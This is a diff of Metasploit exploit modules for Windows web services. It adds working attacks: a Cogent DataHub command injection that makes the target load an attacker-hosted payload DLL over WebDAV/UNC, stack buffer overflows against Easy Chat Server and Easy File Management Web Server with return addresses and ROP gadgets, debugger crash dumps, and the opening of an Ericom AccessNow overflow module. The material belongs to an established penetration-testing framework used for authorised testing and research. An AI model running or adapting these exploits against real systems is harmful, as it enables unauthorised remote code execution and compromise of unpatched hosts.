diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
index 7b11914c7e..26e87aafcc 100644
--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -38,6 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ]
         ],
+      'CmdStagerFlavor' => 'tftp',
       'Privileged' => true,
       'Platform' => 'win',
       'DisclosureDate' => 'Apr 13 2011',
@@ -52,11 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.' })
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb
new file mode 100644
index 0000000000..489190ecf0
--- /dev/null
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -0,0 +1,449 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  # Exploitation is reliable, but the service hangs and needs manual restarting.
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+
+  def initialize
+    super(
+      'Name'        	=> 'Cogent DataHub Command Injection',
+      'Description'   => %q{
+        This module exploits an injection vulnerability in Cogent DataHub prior
+        to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which
+        makes insecure use of the datahub_command function with user controlled
+        data, allowing execution of arbitrary datahub commands and scripts. This
+        module has been tested successfully with Cogent DataHub 7.3.4 on
+        Windows 7 SP1. Please also note that after exploitation, the remote service
+        will most likely hang and restart manually.
+      },
+      'Author'      => [
+        'John Leitch', # Vulnerability discovery
+        'juan vazquez' # Metasploit module
+      ],
+      'Platform'    => 'win',
+      'References'  =>
+        [
+          ['ZDI', '14-136'],
+          ['CVE', '2014-3789'],
+          ['BID', '67486']
+        ],
+      'Stance'      => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'WfsDelay' => 30,
+        'InitialAutoRunScript' => 'migrate -f'
+      },
+      'Targets'     =>
+        [
+          [ 'Cogent DataHub < 7.3.5', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 29 2014'
+    )
+    register_options(
+      [
+        OptString.new('URIPATH',   [ true,  'The URI to use (do not change)', '/']),
+        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on ' +
+                                                      '(do not change)', 80 ]),
+        OptInt.new('WEBDAV_DELAY', [ true,  'Time that the HTTP Server will ' +
+                                          'wait for the payload request', 20]),
+        OptString.new('UNCPATH',   [ false, 'Override the UNC path to use.' ])
+      ], self.class)
+  end
+
+  def autofilter
+    false
+  end
+
+  def on_request_uri(cli, request)
+    case request.method
+      when 'OPTIONS'
+        process_options(cli, request)
+      when 'PROPFIND'
+        process_propfind(cli, request)
+      when 'GET'
+        process_get(cli, request)
+      else
+        vprint_status("#{request.method} => 404 (#{request.uri})")
+        resp = create_response(404, "Not Found")
+        resp.body = ""
+        resp['Content-Type'] = 'text/html'
+        cli.send_response(resp)
+    end
+  end
+
+  def process_get(cli, request)
+
+    if blacklisted_path?(request.uri)
+      vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
+      resp = create_response(404, "Not Found")
+      resp.body = ""
+      cli.send_response(resp)
+      return
+    end
+
+    if request.uri.include?(@basename)
+      print_status("GET => Payload")
+      return if ((p = regenerate_payload(cli)) == nil)
+      data = generate_payload_dll({ :code => p.encoded })
+      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    # Treat index.html specially
+    if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
+      vprint_status("GET => REDIRECT (#{request.uri})")
+      resp = create_response(200, "OK")
+
+      resp.body  = %Q|<html><head><meta http-equiv="refresh" content="0;URL=|
+      resp.body += %Q|#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
+      resp['Content-Type'] = 'text/html'
+      cli.send_response(resp)
+      return
+    end
+
+    # Anything else is probably a request for a data file...
+    vprint_status("GET => DATA (#{request.uri})")
+    data = rand_text_alpha(4 + rand(4))
+    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+  end
+
+  #
+  # OPTIONS requests sent by the WebDav Mini-Redirector
+  #
+  def process_options(cli, request)
+    vprint_status("OPTIONS #{request.uri}")
+    headers = {
+      'MS-Author-Via' => 'DAV',
+      'DASL'          => '<DAV:sql>',
+      'DAV'           => '1, 2',
+      'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY,' +
+                    + ' MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+      'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, ' +
+                    + 'LOCK, UNLOCK',
+      'Cache-Control' => 'private'
+    }
+    resp = create_response(207, "Multi-Status")
+    headers.each_pair {|k,v| resp[k] = v }
+    resp.body = ""
+    resp['Content-Type'] = 'text/xml'
+    cli.send_response(resp)
+  end
+
+  #
+  # PROPFIND requests sent by the WebDav Mini-Redirector
+  #
+  def process_propfind(cli, request)
+    path = request.uri
+    vprint_status("PROPFIND #{path}")
+
+    if path !~ /\/$/
+
+      if blacklisted_path?(path)
+        vprint_status "PROPFIND => 404 (#{path})"
+        resp = create_response(404, "Not Found")
+        resp.body = ""
+        cli.send_response(resp)
+        return
+      end
+
+      if path.index(".")
+        vprint_status "PROPFIND => 207 File (#{path})"
+        body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype/>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<lp2:executable>T</lp2:executable>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>application/octet-stream</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+</D:multistatus>
+|
+        # send the response
+        resp = create_response(207, "Multi-Status")
+        resp.body = body
+        resp['Content-Type'] = 'text/xml; charset="utf8"'
+        cli.send_response(resp)
+        return
+      else
+        vprint_status "PROPFIND => 301 (#{path})"
+        resp = create_response(301, "Moved")
+        resp["Location"] = path + "/"
+        resp['Content-Type'] = 'text/html'
+        cli.send_response(resp)
+        return
+      end
+    end
+
+    vprint_status "PROPFIND => 207 Directory (#{path})"
+    body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
+  <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+    <D:href>#{path}</D:href>
+    <D:propstat>
+      <D:prop>
+        <lp1:resourcetype><D:collection/></lp1:resourcetype>
+        <lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+        <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+        <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+        <D:supportedlock>
+          <D:lockentry>
+            <D:lockscope><D:exclusive/></D:lockscope>
+            <D:locktype><D:write/></D:locktype>
+          </D:lockentry>
+          <D:lockentry>
+            <D:lockscope><D:shared/></D:lockscope>
+            <D:locktype><D:write/></D:locktype>
+          </D:lockentry>
+        </D:supportedlock>
+        <D:lockdiscovery/>
+        <D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+      </D:prop>
+    <D:status>HTTP/1.1 200 OK</D:status>
+  </D:propstat>
+</D:response>
+|
+
+    if request["Depth"].to_i > 0
+      trail = path.split("/")
+      trail.shift
+      case trail.length
+        when 0
+          body << generate_shares(path)
+        when 1
+          body << generate_files(path)
+      end
+    else
+      vprint_status "PROPFIND => 207 Top-Level Directory"
+    end
+
+    body << "</D:multistatus>"
+
+    body.gsub!(/\t/, '')
+
+    # send the response
+    resp = create_response(207, "Multi-Status")
+    resp.body = body
+    resp['Content-Type'] = 'text/xml; charset="utf8"'
+    cli.send_response(resp)
+  end
+
+  def generate_shares(path)
+    share_name = @share_name
+    %Q|
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}#{share_name}/</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype><D:collection/></lp1:resourcetype>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+|
+  end
+
+  def generate_files(path)
+    trail = path.split("/")
+    return "" if trail.length < 2
+
+    base  = @basename
+    exts  = @extensions.gsub(",", " ").split(/\s+/)
+    files = ""
+    exts.each do |ext|
+      files << %Q|
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}#{base}.#{ext}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype/>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<lp2:executable>T</lp2:executable>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>application/octet-stream</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+<D:ishidden b:dt="boolean">1</D:ishidden>
+</D:propstat>
+</D:response>
+|
+    end
+
+    files
+  end
+
+  def gen_timestamp(ttype=nil)
+    ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
+  end
+
+  def gen_datestamp(ttype=nil)
+    ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
+  end
+
+  # This method rejects requests that are known to break exploitation
+  def blacklisted_path?(uri)
+    share_path = "/#{@share_name}"
+    payload_path = "#{share_path}/#{@basename}.dll"
+    case uri
+      when payload_path
+        return false
+      when share_path
+        return false
+      else
+        return true
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
+      'vars_post' =>
+        {
+          'username' => rand_text_alpha(4 + rand(4)),
+          'password' => rand_text_alpha(4 + rand(4))
+        }
+      })
+
+    if res && res.code == 200 && res.body =~ /PermissionRecord/
+        return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def send_injection(dll)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
+      'vars_post' =>
+        {
+          'username' => rand_text_alpha(3 + rand(3)),
+          'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
+                        "(load_plugin \"#{dll}\" 1)(\""
+        }
+      }, 1)
+
+    res
+  end
+
+  def on_new_session(session)
+    if service
+      service.stop
+    end
+
+    super
+  end
+
+  def primer
+    print_status("#{peer} - Sending injection...")
+    res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll")
+    if res
+      print_error("#{peer} - Unexpected answer")
+    end
+  end
+
+  def exploit
+    if datastore['UNCPATH'].blank?
+      @basename = rand_text_alpha(3)
+      @share_name = rand_text_alpha(3)
+      @extensions = "dll"
+      @system_commands_file = rand_text_alpha_lower(4)
+
+      if (datastore['SRVHOST'] == '0.0.0.0')
+        @myhost = Rex::Socket.source_address('50.50.50.50')
+      else
+        @myhost = datastore['SRVHOST']
+      end
+
+      @exploit_unc  = "\\\\#{@myhost}\\"
+
+      if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
+        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
+                  'URIPATH=/')
+      end
+
+      print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}" +
+                    "\\#{@basename}.dll")
+
+      begin
+        # The Windows Webclient needs some time...
+        Timeout.timeout(datastore['WEBDAV_DELAY']) { super }
+      rescue ::Timeout::Error
+        service.stop if service
+      end
+    else
+      # Using external SMB Server
+      if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/
+        host = $1
+        share_name = $2
+        dll_name = $3
+        print_status("#{peer} - Sending injection...")
+        res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}")
+        if res
+          print_error("#{peer} - Unexpected answer")
+        end
+      else
+        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
+                  '\\\\host\\shared_folder\\base_name.dll')
+      end
+    end
+  end
+
+end
diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb
index 7ddae4d011..63f07cc9c6 100644
--- a/modules/exploits/windows/http/desktopcentral_file_upload.rb
+++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb
@@ -46,10 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def upload_file(filename, contents)
     res = send_request_cgi({
-      'uri'     => normalize_uri("agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=#{filename}"),
-      'method'  => 'POST',
-      'data'    => contents,
-      'ctype'   => "text/html"
+      'uri'       => normalize_uri('agentLogUploader'),
+      'method'    => 'POST',
+      'data'      => contents,
+      'ctype'     => 'text/html',
+      'vars_get'  => {
+        'computerName'  => 'DesktopCentral',
+        'domainName'    => 'webapps',
+        'customerId'    => '..',
+        'filename'      => filename
+      }
     })
 
     if res and res.code == 200 and res.body.to_s.empty?
diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb
index 87876ae500..9e42b8ec78 100644
--- a/modules/exploits/windows/http/efs_easychatserver_username.rb
+++ b/modules/exploits/windows/http/efs_easychatserver_username.rb
@@ -17,78 +17,151 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
       'Description'    => %q{
-          This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By
-        sending a overly long authentication request, an attacker may be able to execute
-        arbitrary code.
-
-        NOTE: The offset to SEH is influenced by the installation path of the program.
-        The path, which defaults to "C:\Program Files\Easy Chat Server", is concatentated
-        with "\users\" and the string passed as the username HTTP paramter.
+          This module exploits a stack buffer overflow in EFS Software Easy Chat
+        Server versions 2.0 to 3.1. By sending an overly long authentication
+        request, an attacker may be able to execute arbitrary code.
       },
-      'Author'         => [ 'LSO <lso[at]hushmail.com>' ],
+      'Author'         =>
+        [
+         'LSO <lso[at]hushmail.com>', # original metasploit
+         'Brendan Coles <bcoles[at]gmail.com>' # metasploit
+        ],
       'License'        => BSD_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2004-2466' ],
+          [ 'CVE',   '2004-2466' ],
           [ 'OSVDB', '7416' ],
-          [ 'BID', '25328' ],
+          [ 'OSVDB', '106841' ],
+          [ 'BID',   '25328' ]
         ],
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
         },
-      'Privileged'     => true,
+      'Privileged'     => false,
       'Payload'        =>
         {
-          'Space'    => 500,
-          'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c",
+          'Space'    => 7000,
+          'BadChars' => "\x00\x0a\x0b\x0d\x0f\x20\x25\x26",
           'StackAdjustment' => -3500,
         },
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Easy Chat Server 2.5', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
+          # Tested on Easy Chat Server v2.0, 2.1, 2.2, 2.5, 3.1 on:
+          # -- Windows XP SP 3 (x86) (EN)
+          # -- Windows 7  SP 1 (x64) (EN)
+          # -- Windows 8  SP 0 (x64) (EN)
+          [ 'Automatic Targeting', { 'auto' => true } ],
+          # p/p/r SSLEAY32.dll
+          [ 'Easy Chat Server 2.0', { 'Ret' => 0x10010E2E } ],
+          # p/p/r SSLEAY32.dll
+          [ 'Easy Chat Server 2.1 - 3.1', { 'Ret' => 0x1001071E } ]
         ],
       'DisclosureDate' => 'Aug 14 2007',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
-          "C:\\Program Files\\Easy Chat Server" ])
-      ], self.class )
   end
 
   def check
-    info = http_fingerprint # check method
-    # NOTE: Version 2.5 still reports "1.0" in the "Server" header
-    if (info =~ /Easy Chat Server\/1\.0/)
-      return Exploit::CheckCode::Appears
+    version = get_version
+    if not version
+      return Exploit::CheckCode::Safe
+    end
+    vprint_status "#{peer} - Found version: #{version}"
+    if version !~ /^(2\.\d|3\.0|3\.1)$/
+      return Exploit::CheckCode::Safe
+    end
+    path = get_install_path
+    if not path
+      return Exploit::CheckCode::Detected
+    end
+    vprint_status "#{peer} - Found path: #{path}"
+    return Exploit::CheckCode::Appears
+  end
+
+  #
+  # Get software version from change log
+  #
+  def get_version
+    res = send_request_raw 'uri' => '/whatsnew.txt'
+    if res and res.body =~ /What's new in Easy Chat Server V(\d\.\d)/
+      return "#{$1}"
+    end
+  end
+
+  #
+  # Get software installation path from uninstall file
+  #
+  def get_install_path
+    res = send_request_raw 'uri' => '/unins000.dat'
+    if res and res.body =~ /([A-Z]:\\[^\x00]{2,256})?\\[a-z]+\.htm/i
+      return "#{$1}"
     end
-    Exploit::CheckCode::Safe
   end
 
   def exploit
-    # randomize some values.
-    val = rand_text_alpha(rand(10) + 1)
-    num = rand_text_numeric(1)
 
-    path = datastore['PATH'] + "\\users\\"
-    print_status("path: " + path)
+    # get target
+    if target.name =~ /Automatic/
+      version = get_version
+      vprint_status "#{peer} - Found version: #{version}" if version
+      if not version or version !~ /^(2\.\d|3\.0|3\.1)$/
+        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
+      elsif version =~ /(2\.0)/
+        my_target = targets[1]
+      elsif version =~ /(2\.\d|3\.0|3\.1)/
+        my_target = targets[2]
+      end
+    else
+      my_target = target
+    end
 
-    # exploit buffer.
-    filler = rand_text_alpha(256 - path.length)
-    seh    = generate_seh_payload(target.ret)
-    juju = filler + seh
+    # get install path
+    path = get_install_path
+    if not path
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path")
+    end
+    path << "\\users\\"
+    vprint_status "#{peer} - Using path: #{path}"
 
-    uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#sex=#{num}"
+    # send payload
+    sploit = rand_text_alpha(256 - path.length)
+    sploit << generate_seh_payload(my_target.ret)
+    print_status "#{peer} - Sending request (#{sploit.length} bytes) to target (#{my_target.name})"
+    send_request_cgi({
+      'uri' => '/chat.ghp',
+      'encode_params' => false,
+      'vars_get' => {
+        'username' => sploit,
+        'password' => rand_text_alphanumeric(rand(10) + 1),
+        'room' => 1,
+        'sex' => rand_text_numeric(1)
+      }
+    }, 5)
 
-    print_status("Trying target #{target.name}...")
-
-    send_request_raw({'uri' => uri}, 5)
-
-    handler
-    disconnect
   end
 
 end
+
+=begin
+
+0x004144C8 calls sprintf with the following arguments:
+sprintf(&FileName, "%susers\\%s", path, username);
+
+Since we can make the username larger than the allocated buffer size
+we end up overwriting SEH with a PPR from SSLEAY32.dll and nSEH with
+a short jmp to the beginning of our shellcode.
+
+(46c.144): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=ffffffff ebx=000007f6 ecx=0047fd50 edx=41414141 esi=000007ef edi=0047a3ea
+eip=00445f34 esp=01216b88 ebp=01216ba0 iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
+EasyChat+0x45f34:
+00445f34 8a02            mov     al,byte ptr [edx]          ds:0023:41414141=??
+
+0:005> !exchain
+01216dd8: 41414141
+Invalid exception stack at 41414141
+=end
diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb
new file mode 100644
index 0000000000..3c4f41cb6b
--- /dev/null
+++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb
@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking # Reliable memory corruption
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy File Management Web Server Stack Buffer Overflow',
+      'Description'    => %q{
+        Easy File Management Web Server v4.0 and v5.3 contains a stack buffer
+        overflow condition that is triggered as user-supplied input is not
+        properly validated when handling the UserID cookie. This may allow a
+        remote attacker to execute arbitrary code.
+      },
+      'Author'         =>
+        [
+          'superkojiman',  # Vulnerability discovery
+          'Julien Ahrens', # Exploit
+          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['OSVDB', '107241'],
+          ['EDB',   '33610'],
+          ['BID',   '67542'],
+          ['URL',   'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],
+          ['URL',   'http://www.web-file-management.com/']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'   => 'process'
+        },
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x0a\x0d;",
+          'Space'      => 3420 # Lets play it safe
+        },
+      'Targets'        =>
+        [
+          # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:
+          # -- Microsoft Windows XP [Version 5.1.2600]
+          # -- Microsoft Windows    [Version 6.1.7600]
+          # -- Microsoft Windows    [Version 6.3.9600]
+          ['Automatic Targeting', { 'auto' => true }],
+          ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],
+          ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }],
+          # 0x10010101 = pop ebx > pop ecx > retn
+          # 0xA445ABCF = 0x514CF5 push esp > retn 0c
+          # 0xA4518472 = 0x457452 jmp esp
+          # From ImageLoad.dll
+        ],
+      'DisclosureDate' => 'May 20 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])
+        ], self.class)
+  end
+
+  def get_version
+
+    #
+    # NOTE: Version 5.3 still reports "4.0" in the "Server" header
+    #
+
+    version = nil
+    res = send_request_raw({'uri' => '/whatsnew.txt'})
+    if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
+      version = $1
+      vprint_status "#{peer} - Found version: #{version}"
+    elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
+      version = $1
+      vprint_status "#{peer} - Based on Server header: #{version}"
+    end
+
+    version
+  end
+
+  def check
+    code = Exploit::CheckCode::Safe
+    version = get_version
+    if version.nil?
+      code = Exploit::CheckCode::Unknown
+    elsif version == "5.3"
+      code = Exploit::CheckCode::Appears
+    elsif version == "4.0"
+      code = Exploit::CheckCode::Appears
+    end
+
+    code
+  end
+
+  def exploit
+
+    #
+    # Get target version to determine how to reach call/jmp esp
+    #
+
+    print_status("#{peer} - Fingerprinting version...")
+    version = get_version
+
+    if target.name =~ /Automatic/
+      if version.nil?
+        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
+      elsif version =~ /5\.3/
+        my_target = targets[1]
+      elsif version =~ /4\.0/
+        my_target = targets[2]
+      end
+      print_good("#{peer} - Version #{version} found")
+    else
+      my_target = target
+      unless version && my_target.name.include?(version)
+        print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...")
+      end
+    end
+
+    #
+    # Fu to reach where payload lives
+    #
+
+    sploit =  rand_text(80)                # Junk
+    sploit << [0x1001D8C8].pack("V")       # Push edx
+    sploit << rand_text(280)               # Junk
+    sploit << [my_target.ret].pack("V")    # Pop ebx > pop ecx > retn
+    sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp
+    sploit << [0x10010125].pack("V")       # Contains 00000000 to pass the jnz instruction
+    sploit << [0x10022AAC].pack("V")       # Mov eax,ebx > pop esi > pop ebx > retn
+    sploit << rand_text(8)                 # Filler
+    sploit << [0x1001A187].pack("V")       # Add eax,5bffc883 > retn
+    sploit << [0x1002466D].pack("V")       # Push eax > retn
+    sploit << payload.encoded
+
+    print_status "#{peer} - Trying target #{my_target.name}..."
+
+    #
+    # NOTE: Successful HTTP request is required to trigger
+    #
+
+    send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path),
+      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
+    }, 1)
+  end
+end
+
+=begin
+
+#
+# 0x44f57d This will write UserID up the stack. If the UserID is to large it
+# will overwrite a pointer which is used later on at 0x468702
+#
+
+eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac
+eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
+fmws+0x4f57d:
+0044f57d f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+0:004> dd @esi
+01668084  41414141 41414141 41414141 41414141
+01668094  41414141 41414141 41414141 41414141
+016680a4  41414141 41414141 41414141 41414141
+016680b4  41414141 41414141 41414141 41414141
+016680c4  41414141 41414141 41414141 41414141
+016680d4  41414141 41414141 41414141 41414141
+016680e4  41414141 41414141 41414141 41414141
+016680f4  41414141 41414141 41414141 41414141
+
+(c38.8cc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc
+eip=00468702 esp=015197c0 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
+fmws+0x68702:
+00468702 ff5228          call    dword ptr [edx+28h]  ds:0023:41414169=????????
+
+=end
diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb
new file mode 100644
index 0000000000..ce22761672
--- /dev/null
+++ b/modules/exploits/windows/http/ericom_access_now_bof.rb
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ericom AccessNow Server Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
+        vulnerability is due to an insecure usage of vsprintf with user controlled data,
+        which can be triggered with a malformed HTTP request. This module has been tested
+        successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
+        Server SP2.
+      },
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability Discovery
+          'juan vazquez', # Metasploit Module
+        ],
+      'References'     =>
+        [
+          ['ZDI', '14-160'],
+          ['CVE', '2014-3913'],
+          ['BID', '67777'],
+          ['URL','http://www.ericom.com/security-ERM-2014-610.asp']
+        ],
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
